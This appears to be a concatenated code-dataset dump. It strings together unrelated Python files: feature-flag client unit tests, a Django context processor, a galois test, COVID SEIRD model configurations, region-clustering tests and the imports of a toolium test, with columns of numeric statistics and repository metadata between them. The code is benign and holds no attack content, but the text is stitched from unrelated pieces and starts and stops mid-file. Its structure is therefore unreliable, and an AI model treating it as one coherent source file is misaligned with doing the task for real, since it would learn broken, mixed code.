self.client.set_bucketer(feature_name, bucketer)
self.client.is_enabled(feature_name, foo=True)
bucketer.check.assert_called_with(foo=True)
class TestCreate(BaseTest):
def test_creates_and_returns_instance_of_feature_flag_class(self):
feature_name = self.txt()
flag = self.client.create(feature_name)
self.assertTrue(isinstance(flag, FeatureFlag))
def test_creates_flag_with_correct_name(self):
feature_name = self.txt()
flag = self.client.create(feature_name)
self.assertEqual(feature_name, flag.name)
def test_is_enabled_defaults_to_false(self):
feature_name = self.txt()
self.client.create(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_flag_can_be_enabled_on_create(self):
feature_name = self.txt()
self.client.create(feature_name, is_enabled=True)
self.assertTrue(self.client.is_enabled(feature_name))
def test_emits_pre_create_event_with_correct_args(self):
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_CREATE, f=listener)
feature_name = self.txt()
client_data = {"x": 10}
self.client.events = events
self.client.create(feature_name, is_enabled=True, client_data=client_data)
listener.assert_called_with(
feature_name, is_enabled=True, client_data=client_data
)
def test_emits_post_create_event_with_correct_args(self):
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_CREATE, f=listener)
feature_name = self.txt()
client_data = {"x": 10}
self.client.events = events
self.client.create(feature_name, is_enabled=True, client_data=client_data)
listener.assert_called_with(
feature_name, is_enabled=True, client_data=client_data
)
class TestGet(BaseTest):
def test_returns_instance_of_feature_flag_class(self):
feature_name = self.txt()
self.client.create(feature_name)
flag = self.client.get(feature_name)
self.assertTrue(isinstance(flag, FeatureFlag))
def test_returns_flag_with_correct_name(self):
feature_name = self.txt()
self.client.create(feature_name)
flag = self.client.get(feature_name)
self.assertEqual(feature_name, flag.name)
class TestDestroy(BaseTest):
def test_get_will_return_instance_of_flag(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.destroy(feature_name)
flag = self.client.get(feature_name)
self.assertTrue(isinstance(flag, FeatureFlag))
def test_status_switches_to_disabled(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.enable(feature_name)
self.client.destroy(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.destroy(feature_name)
def test_emits_pre_destroy_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_DESTROY, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.destroy(feature_name)
listener.assert_called_once_with(feature_name)
def test_emits_post_destroy_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_DESTROY, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.destroy(feature_name)
listener.assert_called_once_with(feature_name)
class TestEnable(BaseTest):
def test_is_enabled_will_be_true(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.enable(feature_name)
self.assertTrue(self.client.is_enabled(feature_name))
def test_is_enabled_will_be_true_if_disable_was_called_earlier(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.disable(feature_name)
self.client.enable(feature_name)
self.assertTrue(self.client.is_enabled(feature_name))
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.enable(feature_name)
def test_emits_pre_enable_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_ENABLE, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.enable(feature_name)
listener.assert_called_once_with(feature_name)
def test_emits_post_enable_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_ENABLE, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.enable(feature_name)
listener.assert_called_once_with(feature_name)
class TestDisable(BaseTest):
def test_is_enabled_will_be_false(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.disable(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_is_enabled_will_be_false_if_enable_was_called_earlier(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.enable(feature_name)
self.client.disable(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.disable(feature_name)
def test_emits_pre_disable_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_DISABLE, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.disable(feature_name)
listener.assert_called_once_with(feature_name)
def test_emits_post_disable_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_DISABLE, f=listener)
self.client.events = events
self.client.create(feature_name)
self.client.disable(feature_name)
listener.assert_called_once_with(feature_name)
class TestExists(BaseTest):
def test_exists_is_false_when_feature_does_not_exist(self):
feature_name = self.txt()
self.assertFalse(self.client.exists(feature_name))
def test_exists_is_true_when_feature_does_exist(self):
feature_name = self.txt()
self.client.create(feature_name)
self.assertTrue(self.client.exists(feature_name))
class TestList(BaseTest):
def test_calls_backend_with_correct_args(self):
self.store.list = MagicMock()
limit, offset = 10, 25
list(self.client.list(limit=limit, offset=offset))
self.store.list.assert_called_once_with(limit=limit, offset=offset)
def test_returns_flag_objects(self):
feature_name = self.txt()
self.client.create(feature_name)
flag = next(self.client.list())
self.assertIsInstance(flag, FeatureFlag)
def test_returns_correct_flag_objects(self):
feature_name = self.txt()
expected = self.client.create(feature_name)
actual = next(self.client.list())
self.assertEqual(expected.name, actual.name)
def test_returns_correct_count_of_flag_objects(self):
feature_names = [self.txt() for _ in range(10)]
for feature_name in feature_names:
self.client.create(feature_name)
actual = list(self.client.list())
self.assertEqual(len(feature_names), len(actual))
class TestSetClientData(BaseTest):
def test_calls_backend_with_correct_feature_name(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
[actual, _] = self.store.set_meta.call_args[0]
self.assertEqual(feature_name, actual)
def test_calls_backend_with_instance_of_meta(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
[_, meta] = self.store.set_meta.call_args[0]
self.assertIsInstance(meta, FeatureFlagStoreMeta)
def test_calls_backend_with_correct_meta_client_data(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
[_, meta] = self.store.set_meta.call_args[0]
self.assertEqual(client_data, meta.client_data)
def test_calls_backend_with_non_null_meta_created_date(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
[_, meta] = self.store.set_meta.call_args[0]
self.assertIsNotNone(meta.created_date)
def test_calls_backend_exactly_once(self):
self.store.set_meta = MagicMock()
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name)
self.client.set_client_data(feature_name, client_data)
self.assertEqual(1, self.store.set_meta.call_count)
def test_merges_new_values_with_existing(self):
feature_name = self.txt()
existing_data = {"existing_key": self.txt()}
self.store.create(feature_name, client_data=existing_data)
new_data = {"new_key": self.txt()}
self.client.set_client_data(feature_name, new_data)
item = self.store.get(feature_name)
self.assertEqual({**existing_data, **new_data}, item.meta["client_data"])
def test_can_override_existing_values(self):
feature_name = self.txt()
existing_data = {"existing_key": self.txt()}
self.store.create(feature_name, client_data=existing_data)
new_data = {"existing_key": self.txt(), "new_key": self.txt()}
self.client.set_client_data(feature_name, new_data)
item = self.store.get(feature_name)
self.assertEqual(new_data, item.meta["client_data"])
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
with self.assertRaises(FlagDoesNotExistError):
self.client.set_client_data(feature_name, client_data)
def test_emits_pre_set_client_data_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_SET_CLIENT_DATA, f=listener)
existing_data = {"existing_key": self.txt()}
self.client.events = events
self.client.create(feature_name, client_data=existing_data)
new_data = {"existing_key": self.txt(), "new_key": self.txt()}
self.client.set_client_data(feature_name, new_data)
listener.assert_called_once_with(feature_name, new_data)
def test_emits_post_set_client_data_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_SET_CLIENT_DATA, f=listener)
existing_data = {"existing_key": self.txt()}
self.client.events = events
self.client.create(feature_name, client_data=existing_data)
new_data = {"existing_key": self.txt(), "new_key": self.txt()}
self.client.set_client_data(feature_name, new_data)
listener.assert_called_once_with(feature_name, new_data)
class TestGetClientData(BaseTest):
def test_gets_expected_key_value_pairs(self):
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name, client_data=client_data)
result = self.client.get_client_data(feature_name)
self.assertEqual(client_data, result)
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.get_client_data(feature_name)
class TestGetMeta(BaseTest):
def test_includes_created_date(self):
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name, client_data=client_data)
meta = self.client.get_meta(feature_name)
self.assertTrue("created_date" in meta)
def test_includes_client_data(self):
feature_name = self.txt()
client_data = {self.txt(): self.txt()}
self.client.create(feature_name, client_data=client_data)
meta = self.client.get_meta(feature_name)
self.assertEqual(client_data, meta["client_data"])
def test_raises_for_nonexistent_flag(self):
feature_name = self.txt()
with self.assertRaises(FlagDoesNotExistError):
self.client.get_meta(feature_name)
class TestAddCondition(BaseTest):
def test_condition_gets_included_in_meta(self):
feature_name = self.txt()
condition_checks = {self.txt(): True}
condition = Condition(**condition_checks)
self.client.create(feature_name)
self.client.add_condition(feature_name, condition)
meta = self.client.get_meta(feature_name)
self.assertTrue(condition.to_dict() in meta["conditions"])
def test_condition_gets_appended_to_meta(self):
feature_name = self.txt()
condition_checks = {self.txt(): True}
condition = Condition(**condition_checks)
self.client.create(feature_name)
self.client.add_condition(feature_name, condition)
self.client.add_condition(feature_name, condition)
meta = self.client.get_meta(feature_name)
self.assertEqual(2, len(meta["conditions"]))
def test_emits_pre_add_condition_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_ADD_CONDITION, f=listener)
condition_checks = {self.txt(): True}
condition = Condition(**condition_checks)
self.client.events = events
self.store.create(feature_name)
self.client.add_condition(feature_name, condition)
listener.assert_called_once_with(feature_name, condition)
def test_emits_post_add_condition_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_ADD_CONDITION, f=listener)
condition_checks = {self.txt(): True}
condition = Condition(**condition_checks)
self.client.events = events
self.store.create(feature_name)
self.client.add_condition(feature_name, condition)
listener.assert_called_once_with(feature_name, condition)
class TestSetBucketer(BaseTest):
def test_bucketer_gets_included_in_meta(self):
feature_name = self.txt()
percentage_value = 0.1
bucketer = PercentageBucketer(percentage=Percentage(percentage_value))
self.client.create(feature_name)
self.client.set_bucketer(feature_name, bucketer)
meta = self.client.get_meta(feature_name)
self.assertEqual(bucketer.to_dict(), meta["bucketer"])
def test_emits_pre_set_bucketer_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.PRE_SET_BUCKETER, f=listener)
percentage_value = 0.1
bucketer = PercentageBucketer(percentage=Percentage(percentage_value))
self.client.events = events
self.store.create(feature_name)
self.client.set_bucketer(feature_name, bucketer)
listener.assert_called_once_with(feature_name, bucketer)
def test_emits_post_set_bucketer_event(self):
feature_name = self.txt()
events = FlipperEventEmitter()
listener = MagicMock()
events.on(EventType.POST_SET_BUCKETER, f=listener)
percentage_value = 0.1
bucketer = PercentageBucketer(percentage=Percentage(percentage_value))
self.client.events = events
self.store.create(feature_name)
self.client.set_bucketer(feature_name, bucketer)
listener.assert_called_once_with(feature_name, bucketer)
| 29.816594
| 82
| 0.693273
| 2,501
| 20,484
| 5.367453
| 0.062775
| 0.166344
| 0.122914
| 0.077771
| 0.84848
| 0.822557
| 0.804306
| 0.781287
| 0.76758
| 0.740092
| 0
| 0.001485
| 0.21075
| 20,484
| 686
| 83
| 29.860058
| 0.828849
| 0
| 0
| 0.676744
| 0
| 0
| 0.009129
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 1
| 0.144186
| false
| 0
| 0.02093
| 0.002326
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bc7c921e77ed478e60c5eb44483ee5f6ac512095
| 100
|
py
|
Python
|
couch_lifestream/context_processors.py
|
ericflo/django-couch-lifestream
|
53aac40f6e617b78d07a8c4f121d422e07674e46
|
[
"BSD-3-Clause"
] | 3
|
2015-11-05T03:15:21.000Z
|
2022-03-23T10:31:17.000Z
|
couch_lifestream/context_processors.py
|
ericflo/django-couch-lifestream
|
53aac40f6e617b78d07a8c4f121d422e07674e46
|
[
"BSD-3-Clause"
] | null | null | null |
couch_lifestream/context_processors.py
|
ericflo/django-couch-lifestream
|
53aac40f6e617b78d07a8c4f121d422e07674e46
|
[
"BSD-3-Clause"
] | null | null | null |
from couch_lifestream import USERNAMES
def usernames(request):
return dict(USERNAMES=USERNAMES)
| 25
| 38
| 0.82
| 12
| 100
| 6.75
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 100
| 4
| 39
| 25
| 0.920455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
bcc02ecf51191c2d9e1579977cf8ad34c4af1da5
| 135
|
py
|
Python
|
tests/test_math.py
|
iyanmv/galois
|
a5e6386a684e3e0b47af608217002795dc25c702
|
[
"MIT"
] | 65
|
2021-02-20T04:07:59.000Z
|
2022-03-13T10:14:58.000Z
|
tests/test_math.py
|
iyanmv/galois
|
a5e6386a684e3e0b47af608217002795dc25c702
|
[
"MIT"
] | 303
|
2021-02-22T19:36:25.000Z
|
2022-03-31T14:48:15.000Z
|
tests/test_math.py
|
iyanmv/galois
|
a5e6386a684e3e0b47af608217002795dc25c702
|
[
"MIT"
] | 9
|
2021-03-11T07:40:51.000Z
|
2022-03-06T20:13:17.000Z
|
"""
A pytest module to test the functions in _math.py.
"""
import galois
def test_prod():
assert galois.prod(2, 4, 14) == 2*4*14
| 15
| 50
| 0.651852
| 24
| 135
| 3.583333
| 0.75
| 0.046512
| 0.093023
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 0.2
| 135
| 8
| 51
| 16.875
| 0.722222
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bceb31511a2773f7060d8c45b37fcf821150b21a
| 3,718
|
py
|
Python
|
scripts/configs.py
|
dsheldon/covid
|
5ca06c88afd91ed910c66051821d1e119547222f
|
[
"MIT"
] | 30
|
2020-05-12T19:25:50.000Z
|
2021-03-07T01:51:57.000Z
|
scripts/configs.py
|
dsheldon/covid
|
5ca06c88afd91ed910c66051821d1e119547222f
|
[
"MIT"
] | 6
|
2020-04-29T18:04:11.000Z
|
2021-02-15T17:33:16.000Z
|
scripts/configs.py
|
dsheldon/covid
|
5ca06c88afd91ed910c66051821d1e119547222f
|
[
"MIT"
] | 13
|
2020-05-06T11:48:38.000Z
|
2022-02-22T01:02:51.000Z
|
import covid.models.SEIRD
import covid.models.SEIRD_variable_detection
import covid.models.SEIRD_incident
import covid.util as util
# 2020-04-25 forecast (?)
SEIRD = {
'model' : covid.models.SEIRD.SEIRD,
'args' : {} # use defaults
}
# 2020-05-03 forecast
strongest_prior = {
'model' : covid.models.SEIRD_variable_detection.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100
}
}
# 2020-05-10 forecast
fit_dispersion = {
'model' : covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100
}
}
# State forecasts starting 2020-05-17, all US forecasts
resample_80_last_10 = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10
}
}
# State and US forecasts starting 2020-09-06
longer_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 18.0
}
}
# State and US forecasts starting 2020-09-20, except 2020-10-20
# changed gamma_shape and sigma_shape from 100 to 1000 on 2021-01-10
llonger_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 25.0
}
}
# Less rw
llonger_H_fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0
}
}
# For debugging on May 10
# start with llonger_H_fix
# increase priors on sigma, beta, death_prob, death_rate by factor of 10
debug = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 10000,
'beta_shape': 10,
'death_rate_shape': 100,
'death_prob_conc': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0,
'num_warmup': 100,
'num_samples': 100
}
}
# For debugging on May 10
# start with llonger_H_fix
# increase priors on sigma, beta, death_prob, death_rate by factor of 10
fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 10000,
'beta_shape': 10,
'death_rate_shape': 100,
'death_prob_conc': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'H_duration_est': 25.0
}
}
# State and US forecasts 2020-10-20
lllonger_H = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'H_duration_est': 35.0
}
}
# changed gamma_shape and sigma_shape from 100 to 1000 on 2021-01-10
counties = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 1000,
'sigma_shape': 1000,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'T_future': 8*7
}
}
counties_fix = {
'model': covid.models.SEIRD_incident.SEIRD,
'args' : {
'gamma_shape': 100,
'sigma_shape': 100,
'resample_high': 80,
'rw_use_last': 10,
'rw_scale': 1e-1,
'T_future': 8*7,
'H_duration_est': 25.0,
'beta_shape': 1
}
}
| 22.950617
| 74
| 0.574233
| 476
| 3,718
| 4.231092
| 0.189076
| 0.081927
| 0.119166
| 0.125124
| 0.807845
| 0.756207
| 0.756207
| 0.723436
| 0.706058
| 0.706058
| 0
| 0.106667
| 0.293975
| 3,718
| 161
| 75
| 23.093168
| 0.660571
| 0.178053
| 0
| 0.603175
| 0
| 0
| 0.274194
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.031746
| 0
| 0.031746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4c308168026b5ae21ac655a9947a0ecf8ea9b55b
| 40
|
py
|
Python
|
Lib/inspect.py
|
jdahlin/cpython
|
a51a0e7517c39d0e2268124708e6dfdd3295925d
|
[
"CNRI-Python-GPL-Compatible"
] | null | null | null |
Lib/inspect.py
|
jdahlin/cpython
|
a51a0e7517c39d0e2268124708e6dfdd3295925d
|
[
"CNRI-Python-GPL-Compatible"
] | null | null | null |
Lib/inspect.py
|
jdahlin/cpython
|
a51a0e7517c39d0e2268124708e6dfdd3295925d
|
[
"CNRI-Python-GPL-Compatible"
] | null | null | null |
def getmro(cls):
return cls.__mro__
| 13.333333
| 22
| 0.7
| 6
| 40
| 4
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 40
| 2
| 23
| 20
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
4c58d85130fbc4a5cc48c02ac91af37adfd3f3b2
| 4,410
|
py
|
Python
|
region/p_regions/tests/test_azp_basic_tabu.py
|
Dexterzhao/region
|
596476ad291bfbbeb7d88bb70503aff89c1df59c
|
[
"BSD-3-Clause"
] | null | null | null |
region/p_regions/tests/test_azp_basic_tabu.py
|
Dexterzhao/region
|
596476ad291bfbbeb7d88bb70503aff89c1df59c
|
[
"BSD-3-Clause"
] | null | null | null |
region/p_regions/tests/test_azp_basic_tabu.py
|
Dexterzhao/region
|
596476ad291bfbbeb7d88bb70503aff89c1df59c
|
[
"BSD-3-Clause"
] | 1
|
2018-10-16T23:59:23.000Z
|
2018-10-16T23:59:23.000Z
|
import networkx as nx
from region.p_regions.azp import AZPBasicTabu
from region.tests.util import region_list_from_array, compare_region_lists
from region.util import dataframe_to_dict
from region.p_regions.tests.data import adj, neighbors_dict, gdf, graph, w, \
attr, attr_dict, attr_str, double_attr_str, \
double_attr, double_attr_dict, \
optimal_clustering
# ### TESTS WITH SCALAR attr ##################################################
# test with csr_matrix
def test_scipy_sparse_matrix():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_scipy_sparse_matrix(adj, attr, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a GeoDataFrame as areas argument
def test_geodataframe():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_geodataframe(gdf, attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# tests with a dict as areas argument
def test_dict():
value_dict = dataframe_to_dict(gdf, attr_str)
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_dict(neighbors_dict, value_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# tests with Graph
# ... with dicts as attr and spatially_extensive_attr
def test_graph_dict_basic():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_networkx(graph, attr_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ... with strings as attr and spatially_extensive_attr
def test_graph_str_basic():
nx.set_node_attributes(graph, attr_str, attr_dict)
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_networkx(graph, attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# test with W
def test_w_basic():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_w(w, attr, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ### TESTS WITH NON-SCALAR attr AND spatially_extensive_attr #################
# test with csr_matrix
def test_scipy_sparse_matrix_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_scipy_sparse_matrix(adj, double_attr, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a GeoDataFrame
def test_geodataframe_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_geodataframe(gdf, double_attr_str, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a dict as areas argument
def test_dict_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_dict(neighbors_dict, double_attr_dict, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with Graph
# ... with dicts as attr and spatially_extensive_attr
def test_graph_dict_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_networkx(graph, double_attr_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ... with strings as attr and spatially_extensive_attr
def test_graph_str_multi_attr():
nx.set_node_attributes(graph, attr_str, attr_dict)
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_networkx(graph, double_attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# test with W
def test_w_multi_attr():
cluster_object = AZPBasicTabu(random_state=0)
cluster_object.fit_from_w(w, double_attr, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
| 38.684211
| 79
| 0.781179
| 613
| 4,410
| 5.187602
| 0.106036
| 0.14717
| 0.057233
| 0.077673
| 0.876415
| 0.857862
| 0.849371
| 0.849371
| 0.849371
| 0.849371
| 0
| 0.006276
| 0.13288
| 4,410
| 113
| 80
| 39.026549
| 0.825314
| 0.121315
| 0
| 0.535211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.169014
| false
| 0
| 0.070423
| 0
| 0.239437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4c6b4a0f8b5a7b1a3b8b284ec01c67e6c9482254
| 80
|
py
|
Python
|
ltplugins/__init__.py
|
mezantrop/ltplugins
|
6ecac71f67b3463e219756d78ccdf76108da0909
|
[
"BSD-2-Clause"
] | null | null | null |
ltplugins/__init__.py
|
mezantrop/ltplugins
|
6ecac71f67b3463e219756d78ccdf76108da0909
|
[
"BSD-2-Clause"
] | null | null | null |
ltplugins/__init__.py
|
mezantrop/ltplugins
|
6ecac71f67b3463e219756d78ccdf76108da0909
|
[
"BSD-2-Clause"
] | null | null | null |
from ltplugins.ltplugins import LTPlugins
from ltplugins.__about__ import about
| 26.666667
| 41
| 0.875
| 10
| 80
| 6.6
| 0.4
| 0.393939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 80
| 2
| 42
| 40
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4c77ce748bd1e5a1078132bf828e64555b94ccb7
| 26,218
|
py
|
Python
|
toolium/test/utils/test_driver_utils.py
|
tanistra/toolium
|
d7f06c7ab9f264c42fe55eed4f9a3065512d910e
|
[
"Apache-2.0"
] | null | null | null |
toolium/test/utils/test_driver_utils.py
|
tanistra/toolium
|
d7f06c7ab9f264c42fe55eed4f9a3065512d910e
|
[
"Apache-2.0"
] | null | null | null |
toolium/test/utils/test_driver_utils.py
|
tanistra/toolium
|
d7f06c7ab9f264c42fe55eed4f9a3065512d910e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
u"""
Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U.
This file is part of Toolium.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import time
import mock
import pytest
import requests_mock
from requests.exceptions import ConnectionError
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webelement import WebElement
